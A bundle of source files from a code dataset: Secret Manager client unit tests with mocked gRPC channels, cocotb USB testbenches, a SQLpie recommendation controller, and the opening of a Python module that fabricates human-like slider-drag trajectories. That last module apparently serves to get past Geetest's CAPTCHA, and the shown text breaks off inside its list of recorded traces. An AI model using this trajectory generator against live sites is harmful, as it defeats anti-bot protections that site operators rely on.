| max_stars_repo_path: tests/unit/gapic/v1/test_secret_manager_service_client_v1.py | max_stars_repo_name: busunkim96/python-secret-manager | max_stars_repo_head_hexsha: 54dca6c3d8943a6455fe0d68c094683ed1e32f3e | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: null | stars_events: null .. null |
| max_issues_repo_path: tests/unit/gapic/v1/test_secret_manager_service_client_v1.py | max_issues_repo_name: busunkim96/python-secret-manager | max_issues_repo_head_hexsha: 54dca6c3d8943a6455fe0d68c094683ed1e32f3e | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | issues_events: null .. null |
| max_forks_repo_path: tests/unit/gapic/v1/test_secret_manager_service_client_v1.py | max_forks_repo_name: busunkim96/python-secret-manager | max_forks_repo_head_hexsha: 54dca6c3d8943a6455fe0d68c094683ed1e32f3e | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | forks_events: null .. null |
# -*- coding: utf-8 -*-
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import mock
import pytest
from google.cloud import secretmanager_v1
from google.cloud.secretmanager_v1.proto import resources_pb2
from google.cloud.secretmanager_v1.proto import service_pb2
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self, method, request_serializer=None, response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
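# Standalone sketch of how the stubs above stand in for a real gRPC channel
# (the method name and payloads are placeholders): ChannelStub records every
# (method, request) pair and replays the canned responses in order.
example_channel = ChannelStub(responses=["canned-response"])
example_call = example_channel.unary_unary("/example.Service/ExampleMethod")
assert example_call("example-request") == "canned-response"
assert example_channel.requests == [("/example.Service/ExampleMethod", "example-request")]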
class TestSecretManagerServiceClient(object):
def test_list_secrets(self):
# Setup Expected Response
next_page_token = ""
total_size = 705419236
secrets_element = {}
secrets = [secrets_element]
expected_response = {
"next_page_token": next_page_token,
"total_size": total_size,
"secrets": secrets,
}
expected_response = service_pb2.ListSecretsResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
parent = client.project_path("[PROJECT]")
paged_list_response = client.list_secrets(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.secrets[0] == resources[0]
assert len(channel.requests) == 1
expected_request = service_pb2.ListSecretsRequest(parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_secrets_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
parent = client.project_path("[PROJECT]")
paged_list_response = client.list_secrets(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_create_secret(self):
# Setup Expected Response
name = "name3373707"
expected_response = {"name": name}
expected_response = resources_pb2.Secret(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
parent = client.project_path("[PROJECT]")
secret_id = "secretId-739547894"
secret = {}
response = client.create_secret(parent, secret_id, secret)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.CreateSecretRequest(
parent=parent, secret_id=secret_id, secret=secret
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_secret_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
parent = client.project_path("[PROJECT]")
secret_id = "secretId-739547894"
secret = {}
with pytest.raises(CustomException):
client.create_secret(parent, secret_id, secret)
def test_add_secret_version(self):
# Setup Expected Response
name = "name3373707"
expected_response = {"name": name}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
parent = client.secret_path("[PROJECT]", "[SECRET]")
payload = {}
response = client.add_secret_version(parent, payload)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.AddSecretVersionRequest(
parent=parent, payload=payload
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_add_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
parent = client.secret_path("[PROJECT]", "[SECRET]")
payload = {}
with pytest.raises(CustomException):
client.add_secret_version(parent, payload)
def test_get_secret(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.Secret(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_path("[PROJECT]", "[SECRET]")
response = client.get_secret(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.GetSecretRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_secret_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_path("[PROJECT]", "[SECRET]")
with pytest.raises(CustomException):
client.get_secret(name)
def test_update_secret(self):
# Setup Expected Response
name = "name3373707"
expected_response = {"name": name}
expected_response = resources_pb2.Secret(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
secret = {}
update_mask = {}
response = client.update_secret(secret, update_mask)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.UpdateSecretRequest(
secret=secret, update_mask=update_mask
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_secret_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
secret = {}
update_mask = {}
with pytest.raises(CustomException):
client.update_secret(secret, update_mask)
def test_delete_secret(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_path("[PROJECT]", "[SECRET]")
client.delete_secret(name)
assert len(channel.requests) == 1
expected_request = service_pb2.DeleteSecretRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_secret_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_path("[PROJECT]", "[SECRET]")
with pytest.raises(CustomException):
client.delete_secret(name)
def test_list_secret_versions(self):
# Setup Expected Response
next_page_token = ""
total_size = 705419236
versions_element = {}
versions = [versions_element]
expected_response = {
"next_page_token": next_page_token,
"total_size": total_size,
"versions": versions,
}
expected_response = service_pb2.ListSecretVersionsResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
parent = client.secret_path("[PROJECT]", "[SECRET]")
paged_list_response = client.list_secret_versions(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.versions[0] == resources[0]
assert len(channel.requests) == 1
expected_request = service_pb2.ListSecretVersionsRequest(parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_secret_versions_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
parent = client.secret_path("[PROJECT]", "[SECRET]")
paged_list_response = client.list_secret_versions(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.get_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.GetSecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.get_secret_version(name)
def test_access_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = service_pb2.AccessSecretVersionResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.access_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.AccessSecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_access_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.access_secret_version(name)
def test_disable_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.disable_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.DisableSecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_disable_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.disable_secret_version(name)
def test_enable_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.enable_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.EnableSecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_enable_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.enable_secret_version(name)
def test_destroy_secret_version(self):
# Setup Expected Response
name_2 = "name2-1052831874"
expected_response = {"name": name_2}
expected_response = resources_pb2.SecretVersion(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
response = client.destroy_secret_version(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = service_pb2.DestroySecretVersionRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_destroy_secret_version_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
name = client.secret_version_path("[PROJECT]", "[SECRET]", "[SECRET_VERSION]")
with pytest.raises(CustomException):
client.destroy_secret_version(name)
def test_set_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b"21"
expected_response = {"version": version, "etag": etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
resource = "resource-341064690"
policy = {}
response = client.set_iam_policy(resource, policy)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.SetIamPolicyRequest(
resource=resource, policy=policy
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_set_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
resource = "resource-341064690"
policy = {}
with pytest.raises(CustomException):
client.set_iam_policy(resource, policy)
def test_get_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b"21"
expected_response = {"version": version, "etag": etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
resource = "resource-341064690"
response = client.get_iam_policy(resource)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.GetIamPolicyRequest(resource=resource)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
resource = "resource-341064690"
with pytest.raises(CustomException):
client.get_iam_policy(resource)
def test_test_iam_permissions(self):
# Setup Expected Response
expected_response = {}
expected_response = iam_policy_pb2.TestIamPermissionsResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup Request
resource = "resource-341064690"
permissions = []
response = client.test_iam_permissions(resource, permissions)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.TestIamPermissionsRequest(
resource=resource, permissions=permissions
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_test_iam_permissions_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = secretmanager_v1.SecretManagerServiceClient()
# Setup request
resource = "resource-341064690"
permissions = []
with pytest.raises(CustomException):
client.test_iam_permissions(resource, permissions)
| avg_line_length: 37.823704 | max_line_length: 88 | alphanum_fraction: 0.673612 | qsc_* quality signals: … |
| hexsha: 58f4a508e50691d097d8ae3b13419c3010623243 | size: 3,353 | ext: py | lang: Python |
| max_stars_repo_path: tests/test-sequence.py | max_stars_repo_name: antmicro/usb-test-suite-testbenches- | max_stars_repo_head_hexsha: c2f83a9b074c8a7f98c835584f58df98e5b2f2d5 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 9 | stars_events: 2019-09-16T18:46:08.000Z .. 2021-06-20T05:40:12.000Z |
| max_issues_repo_path: tests/test-sequence.py | max_issues_repo_name: antmicro/usb-test-suite-testbenches- | max_issues_repo_head_hexsha: c2f83a9b074c8a7f98c835584f58df98e5b2f2d5 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: 19 | issues_events: 2019-09-23T10:58:04.000Z .. 2020-06-02T14:34:55.000Z |
| max_forks_repo_path: tests/test-sequence.py | max_forks_repo_name: antmicro/usb-test-suite-testbenches- | max_forks_repo_head_hexsha: c2f83a9b074c8a7f98c835584f58df98e5b2f2d5 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: 2 | forks_events: 2020-05-19T12:22:53.000Z .. 2021-01-07T07:18:08.000Z |
from os import environ
import cocotb
from cocotb_usb.harness import get_harness
from cocotb_usb.device import UsbDevice
from cocotb_usb.descriptors import Descriptor, getDescriptorRequest
descriptorFile = environ['TARGET_CONFIG']
model = UsbDevice(descriptorFile)
@cocotb.test()
def test_control_transfer_in_out(dut):
harness = get_harness(dut)
harness.max_packet_size = model.deviceDescriptor.bMaxPacketSize0
yield harness.reset()
yield harness.wait(1e3, units="us")
yield harness.port_reset(10e3)
yield harness.connect()
yield harness.wait(1e3, units="us")
# After waiting (bus inactivity) let's start with SOF
yield harness.host_send_sof(0x01)
DEVICE_ADDRESS = 20
yield harness.set_device_address(DEVICE_ADDRESS)
yield harness.control_transfer_in(
DEVICE_ADDRESS,
# Get device descriptor
getDescriptorRequest(Descriptor.Types.DEVICE,
descriptor_index=0,
lang_id=0,
length=0x40),
model.deviceDescriptor.get())
yield harness.set_device_address(
11) # This utilizes an OUT control transfer
@cocotb.test()
def test_control_transfer_in_out_in(dut):
"""This transaction is pretty much the first thing any OS will do"""
harness = get_harness(dut)
harness.max_packet_size = model.deviceDescriptor.bMaxPacketSize0
yield harness.reset()
yield harness.wait(1e3, units="us")
yield harness.port_reset(10e3)
yield harness.connect()
yield harness.wait(1e3, units="us")
# After waiting (bus inactivity) let's start with SOF
yield harness.host_send_sof(0x01)
device_address = 0 # After reset
yield harness.control_transfer_in(
device_address,
# Get device descriptor
getDescriptorRequest(Descriptor.Types.DEVICE,
descriptor_index=0,
lang_id=0,
length=0x40),
model.deviceDescriptor.get())
device_address = 11
yield harness.set_device_address(
device_address) # This utilizes an OUT control transfer
yield harness.control_transfer_in(
device_address,
# Get device descriptor
getDescriptorRequest(Descriptor.Types.DEVICE,
descriptor_index=0,
lang_id=0,
length=0x40),
model.deviceDescriptor.get())
@cocotb.test()
def test_control_transfer_out_in(dut):
harness = get_harness(dut)
harness.max_packet_size = model.deviceDescriptor.bMaxPacketSize0
yield harness.reset()
yield harness.wait(1e3, units="us")
yield harness.port_reset(10e3)
yield harness.connect()
yield harness.wait(1e3, units="us")
# After waiting (bus inactivity) let's start with SOF
yield harness.host_send_sof(0x01)
DEVICE_ADDRESS = 20
yield harness.set_device_address(
DEVICE_ADDRESS) # This utilizes an OUT control transfer
yield harness.control_transfer_in(
DEVICE_ADDRESS,
# Get device descriptor
getDescriptorRequest(Descriptor.Types.DEVICE,
descriptor_index=0,
lang_id=0,
length=0x40),
model.deviceDescriptor.get())
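# Refactoring sketch (not part of the original file): the same GET_DESCRIPTOR
# setup packet is built three times above, so a small helper keeps each
# control_transfer_in call focused on the address being exercised.
def get_device_descriptor_request(length=0x40):
    # Standard Device descriptor, index 0, default language ID.
    return getDescriptorRequest(Descriptor.Types.DEVICE,
                                descriptor_index=0,
                                lang_id=0,
                                length=length)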
| avg_line_length: 31.933333 | max_line_length: 72 | alphanum_fraction: 0.653445 | qsc_* quality signals: … |
| hexsha: 4503d2e58db7f706edeb9e29210bf6efd1aef909 | size: 3,734 | ext: py | lang: Python |
| max_stars_repo_path: sqlpie/controllers/collaborative_controller.py | max_stars_repo_name: lessaworld/sqlpie | max_stars_repo_head_hexsha: 22cac1fc7f9cb939e823058f84a68988e03ab239 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 3 | stars_events: 2016-01-27T19:49:23.000Z .. 2020-08-18T13:59:02.000Z |
| max_issues_repo_path: sqlpie/controllers/collaborative_controller.py | max_issues_repo_name: lessaworld/sqlpie | max_issues_repo_head_hexsha: 22cac1fc7f9cb939e823058f84a68988e03ab239 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | issues_events: null .. null |
| max_forks_repo_path: sqlpie/controllers/collaborative_controller.py | max_forks_repo_name: lessaworld/sqlpie | max_forks_repo_head_hexsha: 22cac1fc7f9cb939e823058f84a68988e03ab239 | max_forks_repo_licenses: ["MIT"] | max_forks_count: 1 | forks_events: 2016-02-01T01:57:54.000Z .. 2016-02-01T01:57:54.000Z |
# -*- coding: utf-8 -*-
"""
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
from flask import Response
import json
import sqlpie
class CollaborativeController(sqlpie.BaseController):
@staticmethod
@sqlpie.BaseController.controller_wrapper
def service_similarity(request):
json_data = request.get_json()
if "subject_bucket" in json_data and "subject_id" in json_data and \
"object_bucket" in json_data and "object_id" not in json_data and \
"predicate" in json_data:
subject_bucket = json_data["subject_bucket"]
object_bucket = json_data["object_bucket"]
subject_id = json_data["subject_id"]
object_id = None
predicate = json_data["predicate"]
elif "object_bucket" in json_data and "object_id" in json_data and \
"subject_bucket" in json_data and "subject_id" not in json_data and \
"predicate" in json_data:
subject_bucket = json_data["subject_bucket"]
object_bucket = json_data["object_bucket"]
object_id = json_data["object_id"]
subject_id = None
predicate = json_data["predicate"]
else:
raise sqlpie.CustomException(sqlpie.CustomException.INVALID_ARGUMENTS)
if "metric" in json_data:
metric = json_data["metric"]
if metric != "pearson" and metric != "manhattan":
raise sqlpie.CustomException(sqlpie.CustomException.INVALID_ARGUMENTS)
else:
metric = "pearson"
if "limit" in json_data and str(json_data["limit"]) == int(json_data["limit"]):
limit = json_data["limit"]
else:
limit = 10
engine = sqlpie.Recommender(subject_bucket, object_bucket, subject_id, object_id, predicate)
results = engine.similarity(limit, metric)
return {'success': True, 'results':results}
@staticmethod
@sqlpie.BaseController.controller_wrapper
def service_recommend(request):
json_data = request.get_json()
if "subject_bucket" in json_data and "subject_id" in json_data and \
"object_bucket" in json_data and "object_id" not in json_data and \
"predicate" in json_data:
subject_bucket = json_data["subject_bucket"]
object_bucket = json_data["object_bucket"]
subject_id = json_data["subject_id"]
object_id = None
predicate = json_data["predicate"]
elif "object_bucket" in json_data and "object_id" in json_data and \
"subject_bucket" in json_data and "subject_id" not in json_data and \
"predicate" in json_data:
subject_bucket = json_data["subject_bucket"]
object_bucket = json_data["object_bucket"]
object_id = json_data["object_id"]
subject_id = None
predicate = json_data["predicate"]
else:
raise sqlpie.CustomException(sqlpie.CustomException.INVALID_ARGUMENTS)
if "metric" in json_data:
metric = json_data["metric"]
if metric != "pearson" and metric != "manhattan":
raise sqlpie.CustomException(sqlpie.CustomException.INVALID_ARGUMENTS)
else:
metric = "pearson"
if "limit" in json_data and str(json_data["limit"]) == int(json_data["limit"]):
limit = json_data["limit"]
else:
limit = 10
engine = sqlpie.Recommender(subject_bucket, object_bucket, subject_id, object_id, predicate)
results = engine.recommendation(limit, metric)
return {'success': True, 'results':results}
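# Illustrative request body accepted by both handlers above (the bucket, id and
# predicate values are made-up examples): exactly one of subject_id / object_id
# is given, together with both bucket names and a predicate; metric and limit
# are optional.
EXAMPLE_PAYLOAD = {
    "subject_bucket": "users",
    "object_bucket": "movies",
    "subject_id": "user-42",      # omit object_id when subject_id is present
    "predicate": "rated",
    "metric": "pearson",          # or "manhattan"
    "limit": 10,
}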
| avg_line_length: 40.150538 | max_line_length: 100 | alphanum_fraction: 0.632566 | qsc_* quality signals: … |
| hexsha: 450b8fc583d3caabf6fe7f5ffee32447c74b5ccd | size: 13,214 | ext: py | lang: Python |
| max_stars_repo_path: bibibi/trace.py | max_stars_repo_name: DrSxxG/geetest | max_stars_repo_head_hexsha: b3b7d782fc6f9b3bad136344aa35d6df5a62eb76 | max_stars_repo_licenses: ["MIT"] | max_stars_count: null | stars_events: null .. null |
| max_issues_repo_path: bibibi/trace.py | max_issues_repo_name: DrSxxG/geetest | max_issues_repo_head_hexsha: b3b7d782fc6f9b3bad136344aa35d6df5a62eb76 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | issues_events: null .. null |
| max_forks_repo_path: bibibi/trace.py | max_forks_repo_name: DrSxxG/geetest | max_forks_repo_head_hexsha: b3b7d782fc6f9b3bad136344aa35d6df5a62eb76 | max_forks_repo_licenses: ["MIT"] | max_forks_count: null | forks_events: null .. null |
import random
import pickle
import re
def get_trace_fast(distance):
track = [[-random.randint(15, 22), -random.randint(22, 25), 0]]
track.append([0, 0, 0])
rand_x = 0
passtime = 40
for i in range(10):
rand_x += int(distance * random.randint(1, 2) / 10)
passtime += random.randint(10, 50)
if rand_x < distance:
track.append([rand_x, random.randint(-2, 2), passtime])
passtime += random.randint(100, 150)
track.append([distance, random.randint(-2, 2), passtime])
return track
def get_trace_normal(distance):
track = [[random.randint(19, 30), random.randint(20, 25), 0]]
count = 0
scale = [0.2, 0.5, random.randint(6, 8) / 10]
while count < distance:
if count < distance * scale[0]:
x = random.randint(1, 2)
elif count < distance * scale[1]:
x = random.randint(3, 4)
elif count < distance * scale[2]:
x = random.randint(5, 6)
elif count < distance * 0.9:
x = random.randint(2, 3)
elif count < distance:
x = 1
count += x
track.append([
x,
random.choice([0, 0, 0, 0, 0, 0, -1, 1]),
random.randint(10, 20)
])
track.append([0, 0, random.randint(300, 400)])
return track
# Get the raw trajectory [[x,y,t],...]
def format_track(track):
track = re.findall('{(.*?)}', track)
track_list = []
for x in track:
track_list.append([int(_) for _ in x.split(',')])
return track_list
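# Quick sanity sketch (illustrative; the 120 px distance and the sample string
# are made up): the generated steps cover the requested distance, and
# format_track parses the recorded '{x,y,t};...' strings below back into the
# same [x, y, t] shape.
example_track = get_trace_normal(120)
assert sum(step[0] for step in example_track[1:]) >= 120
assert format_track('{-13,-23,0};{0,0,0};{1,0,91};') == [[-13, -23, 0], [0, 0, 0], [1, 0, 91]]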
def choice_track_list(dist):
source_track = [
'{-13,-23,0};{0,0,0};{1,0,91};{2,0,96};{5,0,107};{9,0,112};{12,0,121};{15,0,128};{17,0,137};{20,0,144};{23,0,152};{26,0,160};{29,0,168};{32,0,176};{35,0,184};{39,0,192};{44,0,200};{51,0,208};{58,0,216};{64,0,224};{69,0,232};{73,0,240};{78,0,248};{82,0,256};{86,0,264};{90,0,272};{99,0,280};{105,0,288};{114,0,296};{121,0,304};{126,0,312};{132,0,320};{137,0,328};{141,0,336};{146,0,344};{149,0,353};{151,0,360};{154,0,368};{156,0,376};{157,0,385};{158,0,392};{160,0,401};{161,0,408};{162,0,432};{163,0,440};{164,1,448};{166,1,464};{168,1,472};{169,1,480};{170,1,488};{171,1,496};{172,1,504};{173,1,512};{174,1,519};{175,1,528};{176,1,536};{177,1,544};{179,1,552};{180,1,568};{181,1,584};{182,1,600};{183,1,608};{184,1,623};{185,1,632};{186,1,640};{188,1,655};{189,1,664};{191,1,681};{192,1,728};{194,1,760};{194,1,1127};{194,1,1127};{194,1,1127};{194,1,1128};{192,1,1479};{190,1,1511};{189,1,1536};{189,1,1841};',
